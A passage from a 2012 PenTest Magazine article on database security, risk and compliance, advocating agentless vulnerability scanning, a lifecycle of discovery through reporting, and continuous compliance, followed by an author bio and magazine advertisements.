Because they can be deployed quickly and with mini-mal project effort, database vulnerability scans offer immediate time-to-benefit. As a critical control process, scanning begins to deliver value on an enterprise-wide scale as soon as it is implemented. But even more im-portantly, scanning offers a proactive approach to da-tabase SRC by providing critical information such as answers to the following questions:

• What is the database asset inventory? • Which databases house sensitive data? • What access controls are in place? • What vulnerabilities exist? • What remediation steps should be taken?

The stakes are high in database security, yet simple solutions exist that are easy to implement. Scanning technology establishes a program of proactive threat management and demonstrates compliance control.

Save The Database, Save The World!

Chapter 6 DEFENSIvE STRATEGY

“Ninety-six percent of breaches were avoidable through simple or

intermediate controls.”

Page57 http://pentestmag.com08/2012 (16) August

Armed proactively with critical discovery and vul-nerability information, database SRC teams are able to prioritize fixes and make better decisions because they have full visibility of the remediation requirements.

Sometimes the list of database vulnerabilities revealed by a scan includes threats that are al-ready planned for remediation at a later time, or cannot be remediated at all. In such cases, SRC best practice dictates that these vulnerabilities be monitored to establish a compensating control. For example, if we understand that privileged us-ers represent a possible separation of duty com-pliance gap, we must also appreciate that it is not possible to remove all privileged users from a da-tabase. So, we must therefore monitor privileged users, but must we monitor all privileged users on all databases?

First, let us ask a more basic question: Who are the privileged users anyway? Are privileged us-ers only those users assigned to a specific privi-leged role called “database administrator”? Or is a privileged user more accurately defined as any user whose privileges are excessive to his or her job role? Let’s remember that to satisfy the audit finding, we have two choices: we must either re-solve the separation of duty condition or imple-

ment monitoring as a compensating control. It stands to reason that fixing vulnerabilities is pref-erable to implementing and managing an ongoing compensating control such as database activity monitoring. The preferred approach to managing privileged users, therefore, is to first scan all user entitlements to determine a baseline of the ex-isting privilege assignments. Next, an entitlement review process should be run to establish desired user rights based on least privilege. Finally, the entitlement review process should provide attes-tation for all users, especially those users who will be granted privileged account status. Once a list of authorized privileged users is established, the excessive privileges of all other users should be revoked. In this way the monitoring scope is reduced and becomes more manageable. A da-tabase vulnerability and user rights scan not on-ly establishes a higher level of protection, it also helps filter the monitoring scope and reduce per-formance overhead. When database SRC starts with a scan, organizations save time, expenses, and computing resources.

The Agentless Manifesto As organizations establish programs for database SRC, the ability to scale control processes across

Figure 1. Agentless Database SRC Architecture

READ

Page58 http://pentestmag.com08/2012 (16) August

the enterprise quickly emerges as a number one success factor. But scaling infrastructure proj-ects enterprise wide can challenge even the most steadfast IT teams. A database is only as secure as its weakest link, and organizations realize that project scopes must include all databases across the enterprise to deliver security and compliance controls that are complete. Again, just as it makes no sense to lock the front door and leave the back door open, organizations must not only lock down critical databases (such as SOx-designated in-stances), but also non-critical database instances where database links offer back door access to sensitive information.

For smaller companies with fewer database in-stances to protect, IT resources are still scarce, so any project must scale fast through implementa-tion and be easy to manage and service down the road. Large organizations managing thousands of database instances are concerned over partial de-ployment outcomes, performance impacts on mis-sion-critical systems, and the complexity of man-aging thousands of endpoints. Most CIO’s, having learned hard lessons through other challenging enterprise-wide deployments, seek assurance that successful project outcomes will be achieved on time and within budget. Project success is often recognized by the quickest time-to-value, the low-est total cost of ownership (TCO), and the most rapid return on investment (ROI).

Agentless architectures are defined as software deployments where no foreign or third-party soft-ware is installed on the endpoint locations, or in the case of database SRC, installed on the da-tabase hosts. Such architectures are intrinsically more scalable, manageable, and serviceable as the entire solution can be deployed on the smallest possible footprint, such as a single server. Agent-less architectures do not require multiple database SRC appliances to achieve security and compli-ance results. Agentless deployments enable enter-prise-wide scopes to be brought live in the short-est possible timeframes and with smaller teams. Furthermore, agentless deployments mean secu-rity and compliance controls start delivering value as soon as the go-live deployment occurs. Total cost of ownership (TCO) and return on investment (ROI) advantages are obvious, since SRC project teams only need to manage a single software de-ployment as opposed to tens, hundreds, or even thousands of individual agents.

Database scanning is an agentless architecture which features a light-weight infrastructure foot-

print reducing the cost and complexity of imple-mentation. The impact of agentless scanning on mission critical systems is low because no foreign software is installed or maintained. DBAs benefit from less risk to database performance and re-duced maintenance requirements.

Agent-based approaches, on the other hand, re-quire the deployment and management of foreign software over the long term. Such architectures require not only one-off installation, but also on-going maintenance, patch management, and per-formance tuning to minimize the impact on produc-tion systems. By way of example, most database activity monitoring (DAM) solutions require the in-stallation of software agents either on the data-base host itself, or on the network supporting the database. As we have discussed, while quite ef-fective at monitoring SQL traffic, these agents al-so generate network and database activity of their own. If not managed closely, such overhead can impact database and network performance. Con-sequently, DAM solutions must be deployed and managed carefully so they are able to scale across the enterprise.

To manage the performance concerns of DAM deployments, and to help them scale, database administrators seek to filter and minimize the monitoring scope. No matter if the monitoring ac-tivity is host or network based, less monitoring means less network traffic and less data to man-age overall. vulnerability scanning provides the intelligence needed to effectively filter and target database activity monitoring scopes. Through an agentless vulnerability scan conducted upstream from the monitoring process, known threats can be identified and remediated proactively. By fil-tering and reducing the scope of monitoring, vul-nerability scanning is able to reduce the cost and complexity of enterprise database activity moni-toring.

For most organizations, the forensic audit capa-bilities of DAM are a necessary requirement and important compensating control for known vulner-abilities such as privileged users. Well-architect-ed and properly deployed DAM systems may also offer real time intrusion detection systems (IDS). But why operate in reactive mode at all? Why wait for a breach or control violation to occur, only to report about it after the fact? Doesn’t it make more sense to identify and remediate threats in the first place?

Database SRC starts with an agentless scan because it enables proactive remediation of vul-

Page59 http://pentestmag.com08/2012 (16) August

nerabilities and reduces monitoring scope. As op-posed to more intrusive agent-based approaches, agentless architectures provide DBA stakehold-ers improved stability and serviceability over mis-sion-critical systems. Database applications may be upgraded and patched regardless of foreign agent dependencies, and organizations are bet-ter able to service their critical applications. This operational autonomy not only improves reliabil-ity, availability, and serviceability, it represents best practice for the management of mission-crit-ical applications.

Database SRC life Cycle Best Practices Best practices are all about completeness. Scan-ning, monitoring, and data encryption – while nec-essary and critical elements of a best practice approach – are, by themselves, only table-stake capabilities, and they are insufficient when de-ployed separately or alone. All tier one database platforms today offer data encryption capabilities as a built-in feature. Whether encryption is imple-mented while data is “at rest” or “in motion” is the function of an effective policy management pro-gram. As with securing other critical infrastruc-ture elements, organizations seeking to achieve best practice in database SRC should commit to a full life cycle approach to achieve truly reliable protection. The database SRC lifecycle is a con-tinuous program that involves an iterative process of discovery, policy management, vulnerability as-sessment, user entitlement review, prioritization of fixes, remediation, monitoring of known vulner-abilities, and finally, deep reporting and analytics of the entire life cycle.

Practitioners generally agree on the following six phase best practices approach to manage the da-tabase SRC life cycle: Figure 2.

DiscoverCreate and describe the database asset invento-ry. Where are the databases located? What kind of databases are they? Who owns each database, and who is responsible for managing them? Which

databases store sensitive data? What types of sensitive data are in the inventory?

ClassifyEstablish classifications for corporate data. Cata-logue and develop a baseline to manage database assets through policies for protection. Set appro-priate rules and controls for managing sensitive data. Establish and document the database SRC plan.

AssessIdentify all vulnerabilities which are present ac-cording to protection policies. Review user rights and data access profiles. Determine password strengths and weaknesses. Are the database con-figurations secured against known vulnerabilities? Have necessary patches been applied?

PrioritizeBased on assessment data and asset classifica-tion, segment vulnerabilities into high, medium, and low priority. Establish ongoing plans for reme-diation.

FixExecute remediation tasks against the prioritized list of vulnerabilities. Strengthen passwords, re-voke excessive privileges, fix configurations, and close patch gaps.

MonitorMonitor all known vulnerabilities such as privileged user activity, and watch un-patched systems. Alert on suspicious or malicious activity.

ReportCreate evidentiary reporting and audit trails to es-tablish an SRC profile of the database invento-ry. Prepare specific reporting to satisfy individu-al compliance guidelines such as SOx and PCI DSS.

For completeness, database SRC best practices must include all phases of the life cycle, and the

Figure 2. The database SRC life cycle best practice methodology

READ

Page60 http://pentestmag.com08/2012 (16) August

process must be iterative. Completeness means assessment targets must be derived from a thor-ough discovery process, and monitoring rules must be based on documented policies. And be-cause the database asset inventory is continual-ly evolving as new instances are added, updated, and deleted at any moment, the best practice life cycle must be executed iteratively and on an ongo-ing basis.

Continuous Compliance Today’s business operates in a compliance driven regulatory environment, and IT organizations have learned that successful auditor/enterprise relation-ships require adherence to compliance regula-tions. Fortunately, many of the best practices that organizations deploy to achieve database secu-rity also reduce corporate risk and improve data-base compliance. What’s more, database security grounds compliance where the data lives – in the database.

However, organizations often operate in reactive mode, awaiting the discovery of a control violation or an audit finding before taking action. As soon as the audit finding has unleashed chaos and gained management attention, the organization scram-bles teams to close the gap. While such a reac-tive approach may deliver results after the fact, it also increases the cost of compliance and is dis-ruptive to the organization. The obvious question is this: Why aren’t organizations more proactive? Why wait to learn that the databases are not only out of compliance, but also unprotected? Shouldn’t we take proactive steps to avoid the train wreck, as opposed to scrambling first responder teams to pick up the pieces?

The goal must be to establish a control frame-work offering continuous compliance. Continuous compliance implies an inherently disciplined system based on best practices where documented con-trols, policy driven processes, reporting, and ongo-ing improvements are a standard operating proce-dure. In such an environment, organizations have established a framework of proactive measures that offers the best possible means of prevention. But since we recognize that no security system is im-penetrable, continuous compliance enables orga-nizations to master the basic control processes re-quired to flag violations and intrinsically answer the four most basic forensic questions:

• What happened? • How did it happen?

• Who did it? • When did they do it?

In addition to being persistent and able to demon-strate compliance on demand, a system of contin-uous compliance must be proactive. Rather than allow an audit to unleash chaos, organizations have a significant opportunity to operate more productively and with less disruption. By estab-lishing a proactive control framework, continuous compliance reduces corporate risk overall.

In a continuous compliance environment the au-dit focus moves away from the SRC status of a single database instance and towards the effec-tiveness of the database SRC control program overall. Rather than drilling into the rights manage-ment status of a particular database or the com-pensating controls placed over certain privileged users, the audit objective is primarily to determine if the database SRC control program is deployed properly and operating as intended.

When an audit finds that an enterprise-wide da-tabase SRC control process not only exists, but is properly deployed and working, organizations gain assurance that their sensitive data is secure and compliant. In the absence of a continuous compliance program, auditors must establish the state of compliance through a “point-and-shoot” approach. The “point-and-shoot” approach means that IT auditors may select any single database, even at random, to perform a database SRC au-dit. With so many regulations requiring control process attestation, and with so many database servers to manage, such a scenario leaves the database SRC team totally reactive and near de-fenseless. Continuous compliance, on the other hand, means auditors abandon the “point-and-shoot” approach and turn their attention to the ef-fectiveness of the database SRC control process as a whole.

A Single version of the Truth With the audit scope now centered on the control process as opposed to the audit of a random da-tabase instance, our ability to slice and dice data-base SRC information from across the enterprise and deliver it on demand becomes a critical capa-bility. Database SRC is all about effective report-ing, and continuous compliance requires a single version of the truth.

“What is the database asset inventory?” “Where is sensitive data located?” “Which users have ac-cess to sensitive data?” “What database vulnera-

bilities exist this month versus last?” “What policies govern each database?” The operational process-es of database SRC are driven by effective report-ing as DBA, CISO and risk management teams work cross functionally to secure the enterprise and establish compliance.

Data warehouse functionality thus becomes a critical capability as pertinent information is con-tinually being collected throughout the database SRC lifecycle, and the volume of data collected can become immense. Under a continuous com-pliance model, auditors seek to understand not only if essential processes exist, but also if these processes are being followed. The data ware-house approach supports these critical audit con-cerns by providing a broad spectrum of reporting across the entire enterprise scope of databases. By managing and storing the evidentiary founda-tion of the audit, the data warehouse establish-es a single version of the truth for database SRC across the enterprise.

joHN oTTMANJohn Ottman is Chairman of Solix Tech-nologies, Inc. and also Chairman of Minds, Inc.. Previously he was President and CEO of Application Security, Inc., (AppSec) and has over 30 years of expe-rience in the enterprise software indus-try. Prior to joining AppSec, John was

President, Global Operations at Princeton Softech, Inc., a high-growth company and leading provider of enterprise data management software which was acquired by IBM in 2007. John was also Executive Vice President of Corio, Inc. where he led the company from the startup phase, to a successful IPO and ultimately through the acquisition of Corio by IBM. Prior to Corio, John spent 10 years at Ora-cle Corporation in various field executive roles including GroupVice President, Industrial Sector. Before Oracle he worked at Wang Laboratories, Inc. for eight years.

a d v e r i s e m e n t

In the Upcoming Issue of

If you would like to contact PenTest team, just send an email to [email protected] or [email protected]. We will reply a.s.a.p.PenTest Magazine has a rights to change the content of the next Magazine Edition.

Exploitation Frameworks

Available to download on September 3rd

In the Upcoming Issue of

Virscent Technologies Pvt. Ltd.

been Incubated in E-Cell IIT Kharagpur

Offering Web, Security and Network Solutions, IT Consulting and Support Services to

numerous clients across the Globe.

We provide the following services:

a. Penetration Testing

b. Multimedia Services

c. Web Development

d. Training:

a. Corporate Training

b. Classroom Training

c. Training programs for Educational Institutions.

Our Partners:

1. E-Cell IIT Kharagpur

2. Education Project Council of India

Website: www.virscent.com

Blog : www.virscent.com/blog

Virscent Technologies Pvt. Ltd., a Brainchild of a team of IIT Kharagpur Graduates

Cell IIT Kharagpur. It is an IT Solutions & Training

ffering Web, Security and Network Solutions, IT Consulting and Support Services to

numerous clients across the Globe.

We provide the following services:

Corporate Training

Classroom Training

Training programs for Educational Institutions.

Education Project Council of India

www.virscent.com/blog

IIT Kharagpur Graduates, has

& Training Company,

ffering Web, Security and Network Solutions, IT Consulting and Support Services to

Keep up to date on the latest developments in the world of digital forensics

/ Training and Certfication/ Management issues/ Tools and Techniques/ eDiscovery/eInvestigation/ Incident Response/First Response/ Hardware and Software/ Network Forensics / Cyber Forensics/ and much more...

Visit digitalforensicsmagazine.comfor the latest news and views from the digitalforensic community with special

articles for registered users.

NEXT ISSUE OUT SOON

Prospective authors should contact [email protected] for information on submissions.

SUBSCRIBE NOW

Read Feature Articles on:

Apple Autopsy:/ A Digital Forensics look at all things Apple

From the Lab:/ In depth technical articles on products and techniques

Legal Section:/ In-depth articles on legal matters affecting Digital Forensics along with the latest legal news from around the world

DFM_flyer_2012.indd 1 03/05/2012 12:37